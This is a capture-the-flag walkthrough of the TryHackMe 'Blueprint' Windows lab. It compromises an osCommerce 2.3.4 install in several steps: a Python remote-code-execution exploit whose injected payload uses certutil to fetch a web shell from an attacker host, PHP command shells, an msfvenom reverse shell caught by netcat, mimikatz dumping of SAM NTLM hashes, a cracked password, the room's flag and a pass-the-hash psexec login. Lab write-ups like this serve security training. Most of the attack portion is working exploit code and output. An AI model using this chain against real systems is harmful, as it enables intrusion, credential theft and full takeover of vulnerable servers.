NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play Blueprint at  https://tryhackme.com/room/blueprint

“Do you have what is takes to hack into this Windows Machine?”

Enumeration

As always we start with a nmap scan

root@kali:~# nmap -sC -sV 10.10.41.176
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 12:43 UTC
Nmap scan report for ip-10-10-41-176.eu-west-1.compute.internal (10.10.41.176)
Host is up (0.00042s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc       Microsoft Windows RPC
139/tcp   open  netbios-ssn Windows 7 Home Basic 7601 Service Pack 1 netbios-ssn
443/tcp   open  ssl/http    Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
3306/tcp  open  mysql       MariaDB (unauthorized)
8080/tcp  open  http        Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open  msrpc       Microsoft Windows RPC
49153/tcp open  msrpc       Microsoft Windows RPC
49154/tcp open  msrpc       Microsoft Windows RPC
49158/tcp open  msrpc       Microsoft Windows RPC
MAC Address: 02:B2:F0:03:D8:00 (Unknown)
Service Info: Hosts: www.example.com, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m59s, deviation: 34m37s, median: 0s
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:b2:f0:03:d8:00 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-04-11T13:44:15+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-11T12:44:16
|_  start_date: 2020-04-11T12:43:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.89 seconds
root@kali:~# 

we have a lot of ports open, the most attractive one for more recon is port 8080

we can see that it’s hosting a oscommerce-2.3.4

diving in the directory we found, leads us to this ugly e-shopping website, next thing we need to do, accumulate data about the version of the oscommerce and examine if it’s vulnerable to anything.

and we have some goodies over here, went through each one and the RCE one seems compatible with our target and well documented

the exploit is written with python, we modified the script with the target we have and the specific port, the directory of the exploitable install.php should be the same, or it won’t work, here exactly where fundamentals in coding are really important, it helps a lot following the exploit which leads to understanding why exactly it is exploitable and with that knowledge, you can modify or even create you own script write it in bash or any preferable language … I suggest for anyone just starting in the field to gain some coding skills.

import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://10.10.41.176:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.41.176:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.10.75.213/shell.php shell.php");'
payload += 'echo $var;'
payload += '/*'


data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")

shell.php contains | <?php $cmd=$_GET[‘cmd’]; system($cmd);?>

The first thing I started with is uploading a simple shell.php code that holds a system() function call, and it executes the given command from the variable $cmd run it, and push back the output pretty simple and powerful.

That was a fail, system function where blocked now, so i used an passthru php shell

c:\Python37>type shell.php
<?php $cmd=$_GET['cmd']; passthru($cmd);?>

running the file configure.php in the directory /oscommerce-2.3.4/catalog/install/inclues/ will execute our pushed payload and upload our shell

c:\DATA>python thm-blueprint-oscommerce234-fileupload.py
[+] Successfully launched the exploit. Open the following URL to execute your code

http://10.10.215.126:8080/oscommerce-2.3.4/catalog/install/includes/configure.php

file at https://github.com/puckiestyle/python/blob/master/thm-blueprint-oscommerce234-fileupload.py I use python to create a simple server to share files. We run the command and see that the upload was successful.  Additionally we are provided with a link that we can utilize in our browser.  Let’s head to our browser and try to use our PHP script to execute a command.

/shell.php?cmd=whoami And we have been successful not only with the upload, but also with the Remote Code Execution.  We see that we are also a system user.  We also know that we have file upload abilities.  Let’s write an msfvenom payload that we can grab a reverse shell with, and then run it.

root@kali:~/thm# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=7777 -f exe > shell.exe;
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
root@kali:~/thm# file shell.exe 
shell.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Now all we need to do is start a Netcat listener to catch the shell, and visit the link we were given above to fire it off.

ce:\pentest\curl http://10.10.215.126:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=shell.exe
E:\PENTEST>curl http://10.10.215.126:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami
nt authority\system
C:\Users\jacco>nc -nlvp 7777
listening on [any] 7777 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.215.126] 49437
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>dir
dir
Volume in drive C has no label.
Volume Serial Number is 14AF-C52C

Directory of C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes

06/08/2020 01:21 PM <DIR> .
06/08/2020 01:21 PM <DIR> ..
04/11/2019 10:52 PM 447 application.php
06/08/2020 01:20 PM 1,212 configure.php
04/11/2019 10:52 PM <DIR> functions
06/08/2020 01:03 PM 28,160 nc.exe
06/08/2020 01:21 PM 73,802 shell.exe
06/08/2020 12:32 PM 42 shell.php
5 File(s) 103,663 bytes
3 Dir(s) 19,508,944,896 bytes free

And we now have system level shell access to the machine. we need to know what the system architecture is on the target machine as Mimikatz as an x64 and x86 version.  Let’s do that quick using systeminfo.

c:\puck>systeminfo
systeminfo

Host Name: BLUEPRINT
OS Name: Microsoft Windows 7 Home Basic
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00346-OEM-8992752-50005
Original Install Date: 1/15/2017, 6:48:59 AM
System Boot Time: 6/8/2020, 12:29:29 PM
System Manufacturer: Xen
System Model: HVM domU
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version: Xen 4.2.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,048 MB
Available Physical Memory: 1,444 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,266 MB
Virtual Memory: In Use: 829 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB2534111
[02]: KB976902
[03]: KB4012215
Network Card(s): 1 NIC(s) Installed.
[01]: Citrix PV Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: Yes
DHCP Server: 10.10.0.1
IP address(es)
[01]: 10.10.215.126
[02]: fe80::8cf8:493a:2768:5b89

c:\puck>

Now that we know our architecture we can grab the correct version of Mimikatz, copy it to our working directory, and use the exploit to upload it.  Additionally we cn check the directory to ensure it uploaded properly as shown below.

c:\puck\certutil -urlcache -split -f http://10.11.3.122/pwdump8.exe C:\puck\pwdump8.exe
**** Online ****
000000 ...
10ee00
CertUtil: -URLCache command completed successfully.
c:\puck\certutil -urlcache -split -f http://10.11.3.122/mimikatz2020.exe C:\puck\mimikatz2010exe
**** Online ****
000000 ...
10ee00
CertUtil: -URLCache command completed successfully.

Mimikatz uploaded and confirmed We use Mimikatz  to reveal the hashes.

c:\puck>mimikatz2020.exe
mimikatz2020.exe

.#####. mimikatz 2.2.0 (x86) #18362 Feb 27 2020 07:42:04
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # lsadump::sam
Domain : BLUEPRINT
SysKey : 147a48de4a9815d2aa479598592b086f
Local SID : S-1-5-21-3130159037-241736515-3168549210

SAMKey : 3700ddba8f7165462130a4441ef47500

RID : 000001f4 (500)
User : Administrator
Hash NTLM: 549a1bcb88e35dc18c7a0b0168631411

RID : 000001f5 (501)
User : Guest

RID : 000003e8 (1000)
User : Lab
Hash NTLM: 30e87bf999828446a1c1209ddde4c450

Now use CrackStation to crack this hash

"Lab" user NTML hash decrypted = googleplus

root.txt = THM{aea1e3ce6fe7f89e10cea833ae009bee}

Extra:

E:\PENTEST>psexec_windows.exe -hashes 549a1bcb88e35dc18c7a0b0168631411:549a1bcb88e35dc18c7a0b0168631411 administrator@10.10.215.126
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.215.126.....
[*] Found writable share ADMIN$
[*] Uploading file MoTOnkja.exe
[*] Opening SVCManager on 10.10.215.126.....
[*] Creating service MDNg on 10.10.215.126.....
[*] Starting service MDNg.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
BLUEPRINT

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

Author

Puckiestyle